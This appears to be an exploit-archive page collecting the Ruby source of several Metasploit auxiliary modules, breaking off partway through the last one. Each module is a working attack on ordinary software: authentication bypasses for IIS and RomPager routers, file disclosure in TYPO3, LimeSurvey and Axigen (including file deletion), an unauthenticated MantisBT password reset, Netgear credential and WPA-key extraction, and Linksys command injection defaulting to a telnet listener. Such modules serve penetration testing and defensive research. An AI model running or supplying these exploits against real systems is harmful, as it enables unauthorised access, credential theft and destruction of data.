This Metasploit module bypasses basic authentication for Internet Information Services (IIS). By appending the NTFS stream name to the directory name in a request, it is possible to bypass authentication.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',        'Description' => %q{          This module bypasses basic authentication for Internet Information Services (IIS).          By appending the NTFS stream name to the directory name in a request, it is          possible to bypass authentication.        },        'References' => [          [ 'CVE', '2010-2731' ],          [ 'OSVDB', '66160' ],          [ 'MSB', 'MS10-065' ],          [ 'URL', 'https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]        ],        'Author' => [          'Soroush Dalili',          'sinn3r'        ],        'License' => MSF_LICENSE,        'DisclosureDate' => '2010-07-02'      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The URI directory where basic auth is enabled', '/'])      ]    )  end  def has_auth    uri = normalize_uri(target_uri.path)    uri << '/' if uri[-1, 1] != '/'    res = send_request_cgi({      'uri' => uri,      'method' => 'GET'    })    vprint_status(res.body) if res    return (res and res.code == 401)  end  def try_auth    uri = normalize_uri(target_uri.path)    uri << '/' if uri[-1, 1] != '/'    uri << Rex::Text.rand_text_alpha(rand(5..14)) + ".#{Rex::Text.rand_text_alpha(3)}"    dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'    user = Rex::Text.rand_text_alpha(rand(5..14))    pass = Rex::Text.rand_text_alpha(rand(5..14))    vprint_status("Requesting: #{dir}")    res = send_request_cgi({      'uri' => dir,      'method' => 'GET',      'authorization' => basic_auth(user, pass)    })    vprint_status(res.body) if res    return (res && (res.code != 401) && (res.code != 404)) ? dir : ''  end  def run    if !has_auth      print_error('No basic authentication enabled')      return    end    bypass_string = try_auth    if bypass_string.empty?      print_error('The bypass attempt did not work')    else      print_good("You can bypass auth by doing: #{bypass_string}")    end  endend

MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass

This Metasploit module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes. Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0. This flaw can be used to read any file that the web server user account has access to view.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize    super(      'Name' => 'TYPO3 sa-2010-020 Remote File Disclosure',      'Description' => %q{        This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.        Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.        This flaw can be used to read any file that the web server user account has access to view.      },      'References' => [        ['CVE', '2010-3714'],        ['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020'],        ['URL', 'http://gregorkopf.de/slides_berlinsides_2010.pdf'],      ],      'Author' => [        'Chris John Riley',        'Gregor Kopf', # Original Discovery      ],      'License' => MSF_LICENSE    )    register_options(      [        OptString.new('URI', [true, 'TYPO3 Path', '/']),        OptString.new('RFILE', [true, 'The remote file to download', 'typo3conf/localconf.php']),        OptInt.new('MAX_TRIES', [true, 'Maximum tries', 10000]),      ]    )  end  def run    # Add padding to bypass TYPO3 security filters    #    # Null byte fixed in PHP 5.3.4    #    case datastore['RFILE']    when nil      # Nothing    when /localconf\.php$/i      jumpurl = "#{datastore['RFILE']}%00/."    when %r{^\.\.(/|\\)}i      print_error('Directory traversal detected... you might want to start that with a /.. or \\..')    else      jumpurl = datastore['RFILE'].to_s    end    print_status("Establishing a connection to #{rhost}:#{rport}")    print_status("Trying to retrieve #{datastore['RFILE']}")    location_base = Rex::Text.rand_text_numeric(1)    counter = 0    queue = []    print_status('Creating request queue')    1.upto(datastore['MAX_TRIES']) do      counter += 1      locationData = "#{location_base}::#{counter}"      queue << "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=0"      if ((counter.to_f / datastore['MAX_TRIES'].to_f) * 100.0).to_s =~ /(25|50|75|100).0$/ # Display percentage complete every 25%        percentage = (counter.to_f / datastore['MAX_TRIES'].to_f) * 100        print_status("Queue #{percentage.to_i}% compiled - [#{counter} / #{datastore['MAX_TRIES']}]")      end    end    print_status('Queue compiled. Beginning requests... grab a coffee!')    counter = 0    queue.each do |check|      counter += 1      check = check.sub('//', '/') # Prevent double // from appearing in uri      begin        file = send_request_raw({          'uri'  => check,          'method'  => 'GET',          'headers'  =>            {              'Connection' => 'Close'            }        }, 25)      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout        return      rescue ::Timeout::Error, ::Errno::EPIPE => e        print_error(e.message)        return      end      if file.nil?        print_error('Connection timed out')        return      end      if ((counter.to_f / queue.length.to_f) * 100.0).to_s =~ /\d0.0$/ # Display percentage complete every 10%        percentage = (counter.to_f / queue.length.to_f) * 100.0        print_status("Requests #{percentage.to_i}% complete - [#{counter} / #{queue.length}]")      end      # file can be nil      case file.headers['Content-Type']      when 'text/html'        case file.body        when 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'          print_error("File #{datastore['RFILE']} does not exist.")          return        when /jumpurl Secure: locationData/i          print_error("File #{datastore['RFILE']} is not accessible.")          return        when 'jumpurl Secure: The requested file was not allowed to be accessed through jumpUrl (path or file not allowed)!'          print_error("File #{datastore['RFILE']} is not allowed to be accessed through jumpUrl.")          return        end      when 'application/octet-stream'        addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB        print_good('Found matching hash')        print_good('Writing local file ' + File.basename(datastore['RFILE'].downcase) + ' to loot')        store_loot('typo3_' + File.basename(datastore['RFILE'].downcase), 'text/xml', addr, file.body, 'typo3_' + File.basename(datastore['RFILE'].downcase), 'Typo3_sa_2010_020')        return      end    end    print_error("#{rhost}:#{rport} [Typo3-SA-2010-020] Failed to retrieve file #{datastore['RFILE']}")  endend

TYPO3 Sa-2010-020 Remote File Disclosure

This Metasploit module exploits an unauthenticated file download vulnerability in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded as a ZIP and unzipped automatically, thus binary files can be downloaded.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework### for extracting filesrequire 'zip'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Limesurvey Unauthenticated File Download',        'Description' => %q{          This module exploits an unauthenticated file download vulnerability          in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded          as a ZIP and unzipped automatically, thus binary files can be downloaded.        },        'Author' => [          'Pichaya Morimoto', # Vulnerability Discovery          'Christian Mehlmauer' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['URL', 'https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/'],          ['URL', 'https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015'],          ['URL', 'https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1']        ],        'DisclosureDate' => '2015-10-12'      )    )    register_options(      [        Opt::RPORT(80),        OptString.new('TARGETURI', [true, 'The base path to the limesurvey installation', '/']),        OptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 15])      ]    )  end  def filepath    datastore['FILEPATH']  end  def traversal_depth    datastore['TRAVERSAL_DEPTH']  end  def payload    traversal = '/..' * traversal_depth    file = "#{traversal}#{filepath}"    serialized = 'a:1:{i:0;O:16:"CMultiFileUpload":1:{s:4:"file";s:' + file.length.to_s + ':"' + file + '";}}'    Rex::Text.encode_base64(serialized)  end  def unzip_file(zipfile)    zip_data = Hash.new    begin      Zip::File.open_buffer(zipfile) do |filezip|        filezip.each do |entry|          zip_data[::File.expand_path(entry.name)] = filezip.read(entry)        end      end    rescue Zip::Error => e      print_error("Error extracting ZIP: #{e}")    end    return zip_data  end  def run    csrf_token = Rex::Text.rand_text_alpha(10)    vars_post = {      'YII_CSRF_TOKEN' => csrf_token,      'destinationBuild' => Rex::Text.rand_text_alpha(5),      'datasupdateinfo' => payload    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri, 'index.php', 'admin', 'update', 'sa', 'backup'),      'cookie' => "YII_CSRF_TOKEN=#{csrf_token}",      'vars_post' => vars_post    })    if res && res.code == 200 && res.body && res.body.include?('Download this file')      match = res.body.match(%r{<div class="updater-background">\s+<p class="success " style="text-align: left;">\s+<strong>[^<]+</strong>\s+<br/>\s+([^<]+)<br/>\s+<a class="btn btn-success" href="([^"]+)" title="Download this file">Download this file</a>})      if match        local_path = match[1]        download_url = match[2]        print_status("File saved to #{local_path}")        print_status("Downloading backup from URL #{download_url}")        res = send_request_cgi({          'method' => 'GET',          'uri' => download_url        })        if res && res.code == 200          unzipped = unzip_file(res.body)          unzipped.each do |filename, content|            print_good("Filename: #{filename}")            print_good(content)            path = store_loot(              'limesurvey.http',              'application/octet-stream',              rhost,              content,              filename            )            print_good("File saved in: #{path}")          end        else          print_error('Failed to download file')        end      else        print_error('Failed to download file')      end    else      print_error('Failed to download file')    end  endend

Limesurvey Unauthenticated File Download

MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MantisBT password reset',        'Description' => %q{          MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.        },        'License' => MSF_LICENSE,        'Author' => [          'John (hyp3rlinx) Page', # initial discovery          'Julien (jvoisin) Voisin' # metasploit module        ],        'References' => [          ['CVE', '2017-7615'],          ['EDB', '41890'],          ['URL', 'https://mantisbt.org/bugs/view.php?id=22690'],          ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']        ],        'Platform' => ['win', 'linux'],        'DisclosureDate' => '2017-04-16'      )    )    register_options(      [        OptString.new('USERID', [ true, 'User id to reset', 1]),        OptString.new('PASSWORD', [ false, 'The new password to set (blank for random)', '']),        OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])      ]    )  end  def check    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/login_page.php'),      'method' => 'GET'    })    if res && res.body && res.body.include?('Powered by <a href="http://www.mantisbt.org" title="bug tracking software">MantisBT')      vprint_status('MantisBT detected')      return Exploit::CheckCode::Detected    else      vprint_status('Not a MantisBT Instance!')      return Exploit::CheckCode::Safe    end  rescue Rex::ConnectionRefused    print_error('Connection refused by server.')    return Exploit::CheckCode::Safe  end  def run    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/verify.php'),      'method' => 'GET',      'vars_get' => {        'id' => datastore['USERID'],        'confirm_hash' => ''      }    })    if !res || !res.body      fail_with(Failure::UnexpectedReply, 'Error in server response. Ensure the server IP is correct.')    end    cookie = res.get_cookies    if cookie == '' || !(res.body.include? 'Your account information has been verified.')      fail_with(Failure::NoAccess, 'Authentication failed')    end    if datastore['PASSWORD'].blank?      password = Rex::Text.rand_text_alpha(8)    else      password = datastore['PASSWORD']    end    if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/      token = ::Regexp.last_match(1)    else      fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')    end    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/account_update.php'),      'method' => 'POST',      'vars_post' => {        'verify_user_id' => datastore['USERID'],        'account_update_token' => ::Regexp.last_match(1),        'realname' => Rex::Text.rand_text_alpha(rand(8..12)),        'password' => password,        'password_confirm' => password      },      'cookie' => cookie    })    if res && res.body && res.body.include?('Password successfully updated')      print_good("Password successfully changed to '#{password}'.")    else      fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed.')    end  endend

MantisBT Password Reset

This Metasploit module exploits a directory traversal vulnerability in the WebAdmin interface of Axigen, which allows an authenticated user to read and delete arbitrary files with SYSTEM privileges. The vulnerability is known to work on Windows platforms. This Metasploit module has been tested successfully on Axigen 8.10 over Windows 2003 SP2.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Axigen Arbitrary File Read and Delete',        'Description' => %q{          This module exploits a directory traversal vulnerability in the WebAdmin          interface of Axigen, which allows an authenticated user to read and delete          arbitrary files with SYSTEM privileges. The vulnerability is known to work on          Windows platforms. This module has been tested successfully on Axigen 8.10 over          Windows 2003 SP2.        },        'Author' => [          'Zhao Liang', # Vulnerability discovery          'juan vazquez' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          [ 'US-CERT-VU', '586556' ],          [ 'CVE', '2012-4940' ],          [ 'OSVDB', '86802' ]        ],        'Actions' => [          ['Read', { 'Description' => 'Read remote file' }],          ['Delete', { 'Description' => 'Delete remote file' }]        ],        'DefaultAction' => 'Read',        'DisclosureDate' => '2012-10-31'      )    )    register_options(      [        Opt::RPORT(9000),        OptInt.new('DEPTH', [ true, 'Traversal depth if absolute is set to false', 4 ]),        OptString.new('TARGETURI', [ true, 'Path to Axigen WebAdmin', '/' ]),        OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),        OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),        OptString.new('PATH', [ true, 'The file to read or delete', '\\windows\\win.ini' ])      ]    )  end  def run    print_status('Trying to login')    if login      print_good('Login Successful')    else      print_error('Login failed, review USERNAME and PASSWORD options')      return    end    @traversal = '../' * 10    file = datastore['PATH']    @platform = get_platform    if @platform == 'windows'      @traversal.gsub!(%r{/}, '\\')      file.gsub!(%r{/}, '\\')    else # unix      print_error('*nix platform detected, vulnerability is only known to work on Windows')      return    end    case action.name    when 'Read'      read_file(datastore['PATH'])    when 'Delete'      delete_file(datastore['PATH'])    end  end  def read_file(file)    print_status('Retrieving file contents...')    res = send_request_cgi(      {        'uri' => normalize_uri(target_uri.path, 'sources', 'logging', 'page_log_file_content.hsp'),        'method' => 'GET',        'cookie' => "_hadmin=#{@session}",        'vars_get' => {          '_h' => @token,          'fileName' => "#{@traversal}#{file}"        }      }    )    if res && (res.code == 200) && res.headers['Content-Type'] && !res.body.empty?      store_path = store_loot('axigen.webadmin.data', 'application/octet-stream', rhost, res.body, file)      print_good("File successfully retrieved and saved on #{store_path}")    else      print_error('Failed to retrieve file')    end  end  def delete_file(file)    print_status("Deleting file #{file}")    res = send_request_cgi(      {        'uri' => normalize_uri(target_uri.path),        'method' => 'GET',        'cookie' => "_hadmin=#{@session}",        'vars_get' => {          '_h' => @token,          'page' => 'vlf',          'action' => 'delete',          'fileName' => "#{@traversal}#{file}"        }      }    )    if res && (res.code == 200) && res.body =~ (/View Log Files/)      print_good("File #{file} deleted")    else      print_error("Error deleting file #{file}")    end  end  def get_platform    print_status('Retrieving platform')    res = send_request_cgi(      {        'uri' => normalize_uri(target_uri.path),        'method' => 'GET',        'cookie' => "_hadmin=#{@session}",        'vars_get' => {          '_h' => @token        }      }    )    if res && (res.code == 200)      if res.body =~ /Windows/        print_good('Windows platform found')        return 'windows'      elsif res.body =~ /Linux/        print_good('Linux platform found')        return 'unix'      end    end    print_warning('Platform not found, assuming UNIX flavor')    return 'unix'  end  def login    res = send_request_cgi(      {        'uri' => normalize_uri(target_uri.path),        'method' => 'POST',        'vars_post' => {          'username' => datastore['USERNAME'],          'password' => datastore['PASSWORD'],          'submit' => 'Login',          'action' => 'login'        }      }    )    if res && (res.code == 303) && res.headers['Location'] =~ (/_h=([a-f0-9]*)/)      @token = ::Regexp.last_match(1)      if res.get_cookies =~ /_hadmin=([a-f0-9]*)/        @session = ::Regexp.last_match(1)        return true      end    end    return false  endend

Axigen Arbitrary File Read And Delete

This Metasploit module exploits HTTP servers that appear to be vulnerable to the Misfortune Cookie vulnerability which affects Allegro Software Rompager versions before 4.34 and can allow attackers to authenticate to the HTTP service as an administrator without providing valid credentials.

**Allegro Software RomPager Misfortune Cookie (CVE-2014-9222) Authentication Bypass**

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize(info = {})    super(      update_info(        info,        'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",        'Description' => %q{          This module exploits HTTP servers that appear to be vulnerable to the          'Misfortune Cookie' vulnerability which affects Allegro Software          Rompager versions before 4.34 and can allow attackers to authenticate          to the HTTP service as an administrator without providing valid          credentials.        },        'Author' => [          'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module          'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module          'Lior Oppenheim' # CVE-2014-9222        ],        'References' => [          ['CVE', '2014-9222'],          ['URL', 'https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/'],          ['URL', 'https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices          ['URL', 'https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC        ],        'DisclosureDate' => '2014-12-17',        'License' => MSF_LICENSE      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'URI to test', '/']),      ], Exploit::Remote::HttpClient    )    register_advanced_options(      [        Msf::OptBool.new('ForceAttempt', [ false, 'Force exploit attempt for all known cookies', false ]),      ], Exploit::Remote::HttpClient    )  end  def headers    {      'Referer' => full_uri    }  end  # List of known values and models  def devices_list    known_devices = {      :'AZ-D140W' =>          {            name: 'Azmoon', model: 'AZ-D140W', values: [              [107367693, 13]            ]          },      :'BiPAC 5102S' =>            {              name: 'Billion', model: 'BiPAC 5102S', values: [                [107369694, 13]              ]            },      :'BiPAC 5200' =>            {              name: 'Billion', model: 'BiPAC 5200', values: [                [107369545, 9],                [107371218, 21]              ]            },      :'BiPAC 5200A' =>            {              name: 'Billion', model: 'BiPAC 5200A', values: [                [107366366, 25],                [107371453, 9]              ]            },      :'BiPAC 5200GR4' =>            {              name: 'Billion', model: 'BiPAC 5200GR4', values: [                [107367690, 21]              ]            },      :'BiPAC 5200SRD' =>            {              name: 'Billion', model: 'BiPAC 5200SRD', values: [                [107368270, 1],                [107371378, 3],                [107371218, 13]              ]            },      :'DSL-2520U' =>            {              name: 'D-Link', model: 'DSL-2520U', values: [                [107368902, 25]              ]            },      :'DSL-2600U' =>            {              name: 'D-Link', model: 'DSL-2600U', values: [                [107366496, 13],                [107360133, 20]              ]            },      :'TD-8616' =>            {              name: 'TP-Link', model: 'TD-8616', values: [                [107371483, 21],                [107369790, 17],                [107371161, 1],                [107371426, 17],                [107370211, 5],              ]            },      :'TD-8817' =>            {              name: 'TP-Link', model: 'TD-8817', values: [                [107369790, 17],                [107369788, 1],                [107369522, 25],                [107369316, 21],                [107369321, 9],                [107351277, 20]              ]            },      :'TD-8820' =>            {              name: 'TP-Link', model: 'TD-8820', values: [                [107369768, 17]              ]            },      :'TD-8840T' =>            {              name: 'TP-Link', model: 'TD-8840T', values: [                [107369845, 5],                [107369790, 17],                [107369570, 1],                [107369766, 1],                [107369764, 5],                [107369688, 17]              ]            },      :'TD-W8101G' =>            {              name: 'TP-Link', model: 'TD-W8101G', values: [                [107367772, 37],                [107367808, 21],                [107367751, 21],                [107367749, 13],                [107367765, 25],                [107367052, 25],                [107365835, 1]              ]            },      :'TD-W8151N' =>            {              name: 'TP-Link', model: 'TD-W8151N', values: [                [107353867, 24]              ]            },      :'TD-W8901G' =>            {              name: 'TP-Link', model: 'TD-W8901G', values: [                [107367787, 21],                [107368013, 5],                [107367854, 9],                [107367751, 21],                [107367749, 13],                [107367765, 25],                [107367682, 21],                [107365835, 1],                [107367052, 25]              ]            },      :'TD-W8901GB' =>            {              name: 'TP-Link', model: 'TD-W8901GB', values: [                [107367756, 13],                [107369393, 21]              ]            },      :'TD-W8901N' =>            {              name: 'TP-Link', model: 'TD-W8901N', values: [                [107353880, 0]              ]            },      :'TD-W8951ND' =>            {              name: 'TP-Link', model: 'TD-W8951ND', values: [                [107369839, 25],                [107369876, 13],                [107366743, 21],                [107364759, 25],                [107364759, 13],                [107364760, 21]              ]            },      :'TD-W8961NB' =>            {              name: 'TP-Link', model: 'TD-W8961NB', values: [                [107369844, 17],                [107367629, 21],                [107366421, 13]              ]            },      :'TD-W8961ND' =>            {              name: 'TP-Link', model: 'TD-W8961ND', values: [                [107369839, 25],                [107369876, 13],                [107364732, 25],                [107364771, 37],                [107364762, 29],                [107353880, 0],                [107353414, 36]              ]            },      :'P-660R-T3 v3' => # This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s            {              name: 'ZyXEL', model: 'P-660R-T3', values: [                [107369567, 21]              ]            },      :'P-660RU-T3 v2' => # Couldn't verify this            {              name: 'ZyXEL', model: 'P-660R-T3', values: [                [107369567, 21]              ]            },      ALL => # Used when `ForceAttempt` === true            { name: 'Unknown', model: 'Forced', values: [] }    }    # collect all known cookies for a brute force option    all_cookies = []    known_devices.collect { |_, v| v[:values] }.each do |list|      all_cookies += list    end    known_devices[:ALL][:values] = all_cookies.uniq    known_devices  end  def check_response_fingerprint(res, fallback_status)    fp = http_fingerprint(response: res)    vprint_status("Fingerprint: #{fp}")    # ensure the fingerprint at least appears vulnerable    if %r{RomPager/(?<version>[\d.]+)} =~ fp      vprint_status("#{peer} is RomPager #{version}")      if Rex::Version.new(version) < Rex::Version.new('4.34') && /realm="(?<model>.+)"/ =~ fp        return model      end    end    fallback_status  end  def run    res = send_request_raw(      'uri' => normalize_uri(target_uri.path.to_s),      'method' => 'GET'    )    model = check_response_fingerprint(res, Exploit::CheckCode::Detected)    if model != Exploit::CheckCode::Detected      devices = devices_list[model.to_sym]      devices = devices_list[:ALL] if devices.nil? && datastore['ForceAttempt']      if !devices.nil?        print_good("Detected device:#{devices[:name]} #{devices[:model]}")        devices[:values].each do |value|          cookie = "C#{value[0]}=#{'B' * value[1]}\x00"          res = send_request_raw(            'uri' => normalize_uri(target_uri.path.to_s),            'method' => 'GET',            'headers' => headers.merge('Cookie' => cookie)          )          if !res.nil? && (res.code <= 302)            print_good('Good response, please check host, authentication should be disabled')            break          else            print_error('Bad response')          end        end      else        print_error("No matching values for fingerprint #{model}")      end    else      print_error('Unknown device')    end  endend

Allegro Software RomPager Misfortune Cookie (CVE-2014-9222) Authentication Bypass

This Metasploit module exploits an authentication bypass vulnerability in different Netgear devices. It allows you to extract the password for the remote management interface.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize    super(      'Name' => 'Netgear Unauthenticated SOAP Password Extractor',      'Description' => %q{        This module exploits an authentication bypass vulnerability in different Netgear devices.        It allows to extract the password for the remote management interface. This module has been        tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:        NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,        NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),        NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),        NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),        NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),        NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),        NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),        NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),        NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),        NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),        NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)      },      'References' => [        [ 'BID', '72640' ],        [ 'OSVDB', '118316' ],        [ 'URL', 'https://github.com/darkarnium/secpub/tree/master/Vulnerabilities/NetGear/SOAPWNDR' ]      ],      'Author' => [        'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery        'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module        'h00die <mike@shorebreaksecurity.com>' # Metasploit enhancements/docs      ],      'License' => MSF_LICENSE,      'DisclosureDate' => 'Feb 11 2015'    )  end  def run    print_status('Trying to access the configuration of the device')    # extract device details    action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo'    print_status('Extracting Firmware version...')    extract_data(action)    # extract credentials    action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo'    print_status('Extracting credentials...')    extract_data(action)    # extract wifi info    action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo'    print_status('Extracting Wifi...')    extract_data(action)    # extract WPA info    action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys'    print_status('Extracting WPA Keys...')    extract_data(action)  end  def extract_data(soap_action)    res = send_request_cgi({      'method' => 'POST',      'uri' => '/',      'headers' => {        'SOAPAction' => soap_action      },      'data' => '='    })    return if res.nil?    return if res.code == 404    return if res.headers['Server'].nil?    # unknown if other devices have other Server headers    return if res.headers['Server'] !~ %r{Linux/2.6.15 uhttpd/1.0.0 soap/1.0}    if res.body =~ %r{<NewPassword>(.*)</NewPassword>}      print_status('Credentials found, extracting...')      extract_credentials(res.body)    end    if res.body =~ %r{<ModelName>(.*)</ModelName>}      model_name = ::Regexp.last_match(1)      print_good("Model #{model_name} found")    end    if res.body =~ %r{<Firmwareversion>(.*)</Firmwareversion>}      firmware_version = ::Regexp.last_match(1)      print_good("Firmware version #{firmware_version} found")      # store all details as loot      loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body)      print_good("Device details downloaded to: #{loot}")    end    if res.body =~ %r{<NewSSID>(.*)</NewSSID>}      ssid = ::Regexp.last_match(1)      print_good("Wifi SSID: #{ssid}")    end    if res.body =~ %r{<NewBasicEncryptionModes>(.*)</NewBasicEncryptionModes>}      wifi_encryption = ::Regexp.last_match(1)      print_good("Wifi Encryption: #{wifi_encryption}")    end    if res.body =~ %r{<NewWPAPassphrase>(.*)</NewWPAPassphrase>}      wifi_password = ::Regexp.last_match(1)      print_good("Wifi Password: #{wifi_password}")    end  rescue ::Rex::ConnectionError    vprint_error('Failed to connect to the web server')    return  end  def extract_credentials(body)    body.each_line do |line|      next unless line =~ %r{<NewPassword>(.*)</NewPassword>}      pass = ::Regexp.last_match(1)      print_good("admin / #{pass} credentials found")      connection_details = {        module_fullname: fullname,        private_data: pass,        private_type: :password,        username: 'admin',        status: Metasploit::Model::Login::Status::UNTRIED      }.merge(service_details)      create_credential_and_login(connection_details)    end    # store all details as loot    loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body)    print_good("Account details downloaded to: #{loot}")  endend

Netgear Unauthenticated SOAP Password Extractor

Some Linksys Routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command. A ping command against a controlled system for can be used for testing purposes.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Linksys E1500/E2500 Remote Command Execution',        'Description' => %q{          Some Linksys Routers are vulnerable to an authenticated OS command injection.          Default credentials for the web interface are admin/admin or admin/password. Since          it is a blind os command injection vulnerability, there is no output for the          executed command. A ping command against a controlled system for can be used for          testing purposes.        },        'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],        'License' => MSF_LICENSE,        'References' => [          [ 'OSVDB', '89912' ],          [ 'BID', '57760' ],          [ 'EDB', '24475' ],          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]        ],        'DisclosureDate' => '2013-02-05'      )    )    register_options(      [        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),        OptString.new('CMD', [ true, 'The command to execute', 'telnetd -p 1337'])      ]    )  end  def run    uri = '/apply.cgi'    user = datastore['HttpUsername']    pass = datastore['HttpPassword']    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")    begin      res = send_request_cgi({        'uri' => uri,        'method' => 'GET',        'authorization' => basic_auth(user, pass)      })      return if res.nil?      return if (res.code == 404)      if [200, 301, 302].include?(res.code)        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")      else        print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")        return      end    rescue ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")      return    end    print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])    cmd = datastore['CMD']    # original post request:    # data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&    # action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="    vprint_status("#{rhost}:#{rport} - using the following target URL: 